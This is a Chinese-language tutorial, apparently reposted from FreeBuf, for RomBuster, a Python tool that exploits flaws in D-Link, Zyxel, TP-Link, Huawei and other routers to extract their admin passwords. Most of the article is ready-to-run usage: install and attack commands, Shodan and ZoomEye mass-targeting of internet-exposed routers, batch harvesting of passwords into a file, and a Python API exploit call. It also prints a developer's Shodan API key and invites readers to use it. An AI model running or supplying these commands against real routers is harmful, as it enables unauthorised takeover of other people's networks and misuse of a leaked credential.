如何使用RomBuster獲取你的網絡路由器密碼
作者:Alpha_h4ck
RomBuster是一款功能強大的針對網絡路由器的漏洞利用工具,該工具能夠幫助廣大研究人員對網絡路由器的安全性進行分析,并獲取目標路由器的管理員密碼。
關于RomBuster
RomBuster是一款功能強大的針對網絡路由器的漏洞利用工具,該工具能夠幫助廣大研究人員對網絡路由器的安全性進行分析,并獲取目標路由器的管理員密碼。
功能介紹
- 能夠利用大多數熱門路由器中的安全漏洞,例如D-Link、Zyxel、TP-Link和華為等等。
- 經過優化處理,可從列表中讀取多個目標路由器,并進行安全分析和漏洞利用。
- 簡單的命令行接口和API用法。
工具安裝
由于RomBuster使用Python3開發,因此首先需要在本地設備上安裝并配置好Python3環境。接下來,廣大研究人員可以使用下列命令下載并安裝RomBuster:
- pip3 install git+https://github.com/EntySec/RomBuster
基礎使用
RomBuster的使用非常簡單,我們只需要在命令行終端中輸入“rombuster”命令即可使用RomBuster:
- usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
- [--zoomeye ZOOMEYE] [-p PAGES]
- RomBuster is a router exploitation tool that allows to disclosure network
- router admin password.
- optional arguments:
- -h, --help 顯示這個幫助信息并退出
- -o OUTPUT, --output OUTPUT
- 將結果存儲至文件
- -i INPUT, --input INPUT
- 地址列表輸入文件
- -a ADDRESS, --address ADDRESS
- 提供單個地址
- --shodan SHODAN 通過網絡利用遠程設備所使用的Shodan API密鑰
- --zoomeye ZOOMEYE 通過網絡利用遠程設備所使用的ZoomEye API密鑰
- -p PAGES, --pages PAGES
- 需要通過ZoomEye獲取的頁面數量
工具使用樣例
(1) 攻擊單個路由器
下列命令可以攻擊單個網絡路由器:
- rombuster -a 192.168.99.1
(2) 通過網絡攻擊遠程路由器
接下來,我們可以使用Shodan搜索引擎來搜索并攻擊網絡上的由器:
- rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意:項目中給出的Shodan API密鑰(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是開發人員自己的專業版API密鑰,你可以使用你自己的密鑰,當然了你想用開發人員的也沒意見,大家資源共享嘛!
(3) 從輸入文件獲取目標路由器
我們還可以使用開放數據庫中提供的攝像頭地址:
- rombuster -i routers.txt -o passwords.txt
注意:此命令將會攻擊routers.txt中給出的所有攝像頭,并會將所有獲取到的密碼存儲至passwords.txt文件中。
API使用
RomBuster還提供了自己的Python API,可以將其導入至你們自己的項目代碼中并調用其功能:
- from rombuster import RomBuster
(1) 基礎函數
下面給出的是RomBuster支持的基礎函數,可以用于利用指定路由器中的安全漏洞:
exploit(address):攻擊指定地址的單個路由器
(2) 調用樣例
攻擊單個路由器:
- from rombuster import RomBuster
- rombuster = RomBuster()
- creds = rombuster.exploit('192.168.99.1')
- print(creds)
項目地址
RomBuster:【GitHub傳送門】
責任編輯:趙寧寧
來源:
FreeBuf
